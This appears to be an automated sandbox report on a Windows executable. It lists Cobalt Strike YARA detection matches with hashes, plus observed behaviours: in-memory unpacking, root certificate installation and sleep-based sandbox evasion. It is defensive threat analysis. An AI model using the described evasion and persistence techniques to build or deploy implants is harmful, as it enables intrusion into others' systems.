          Source: 0.2.yZah650lHL.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.yZah650lHL.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
          Source: 0.2.yZah650lHL.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
          Source: 0.2.yZah650lHL.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
          Source: 0.2.yZah650lHL.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 0.2.yZah650lHL.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.yZah650lHL.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
          Source: 0.2.yZah650lHL.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.yZah650lHL.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
          Source: 0.2.yZah650lHL.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.yZah650lHL.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 0.2.yZah650lHL.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
          Source: 0.2.yZah650lHL.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
          Source: 0.2.yZah650lHL.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
          Source: 0.2.yZah650lHL.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 0.2.yZah650lHL.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
          Source: 0.2.yZah650lHL.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.yZah650lHL.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
          Source: 0.2.yZah650lHL.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
          Source: 0.2.yZah650lHL.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 0.2.yZah650lHL.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.yZah650lHL.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
          Source: 0.2.yZah650lHL.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.yZah650lHL.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
          Source: 0.2.yZah650lHL.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.yZah650lHL.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 0.2.yZah650lHL.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
          Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
          Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
          Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
          Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
          Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
          Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
          Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
          Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
          Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
          Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
          Source: Process Memory Space: yZah650lHL.exe PID: 6572, type: MEMORYSTRMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
          Source: Process Memory Space: yZah650lHL.exe PID: 6572, type: MEMORYSTRMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
          Source: Process Memory Space: yZah650lHL.exe PID: 6572, type: MEMORYSTRMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_00670B70 LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,0_2_00670B70
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_00673A64 CreateThread,GetModuleHandleA,GetProcAddress,CreateToolhelp32Snapshot,Thread32Next,Sleep,0_2_00673A64
          Source: yZah650lHL.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\yZah650lHL.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: yZah650lHL.exeVirustotal: Detection: 80%
          Source: yZah650lHL.exeReversingLabs: Detection: 86%
          Source: C:\Users\user\Desktop\yZah650lHL.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\yZah650lHL.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\yZah650lHL.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\yZah650lHL.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\yZah650lHL.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\yZah650lHL.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\yZah650lHL.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\yZah650lHL.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\yZah650lHL.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\yZah650lHL.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\yZah650lHL.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\yZah650lHL.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\yZah650lHL.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\yZah650lHL.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\yZah650lHL.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\yZah650lHL.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\yZah650lHL.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\yZah650lHL.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\yZah650lHL.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\yZah650lHL.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\yZah650lHL.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\yZah650lHL.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\yZah650lHL.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\yZah650lHL.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\yZah650lHL.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\yZah650lHL.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\yZah650lHL.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\yZah650lHL.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior

          Data Obfuscation

          barindex
          Detected unpacking (creates a PE file in dynamic memory)
          Source: C:\Users\user\Desktop\yZah650lHL.exeUnpacked PE file: 0.2.yZah650lHL.exe.660000.2.unpack
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_0066D83C GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_0066D83C
          Source: yZah650lHL.exeStatic PE information: section name: .xdata
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_001D776C push 0000006Ah; retf 0_2_001D7784
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_0069916C push 0000006Ah; retf 0_2_00699184

          Persistence and Installation Behavior

          barindex
          Installs new ROOT certificates
          Source: C:\Users\user\Desktop\yZah650lHL.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
          Source: C:\Users\user\Desktop\yZah650lHL.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_006801A8 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_006801A8
          Source: C:\Users\user\Desktop\yZah650lHL.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
          Source: C:\Users\user\Desktop\yZah650lHL.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
          Source: C:\Users\user\Desktop\yZah650lHL.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior

          Malware Analysis System Evasion

          barindex
          Contains functionality to detect sleep reduction / modifications
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_006758540_2_00675854
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_0066FA1C0_2_0066FA1C
          Source: C:\Users\user\Desktop\yZah650lHL.exeWindow / User API: threadDelayed 3936Jump to behavior
          Source: C:\Users\user\Desktop\yZah650lHL.exeWindow / User API: threadDelayed 5865Jump to behavior
          Source: C:\Users\user\Desktop\yZah650lHL.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-37698
          Source: C:\Users\user\Desktop\yZah650lHL.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-37556
          Source: C:\Users\user\Desktop\yZah650lHL.exeAPI coverage: 6.6 %
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_0066FA1C0_2_0066FA1C
          Source: C:\Users\user\Desktop\yZah650lHL.exe TID: 6576Thread sleep count: 3936 > 30Jump to behavior
          Source: C:\Users\user\Desktop\yZah650lHL.exe TID: 6576Thread sleep time: -39360000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\yZah650lHL.exe TID: 6688Thread sleep time: -120000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\yZah650lHL.exe TID: 6576Thread sleep count: 5865 > 30Jump to behavior
          Source: C:\Users\user\Desktop\yZah650lHL.exe TID: 6576Thread sleep time: -58650000s >= -30000sJump to behavior
          Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
          Source: C:\Users\user\Desktop\yZah650lHL.exeLast function: Thread delayed
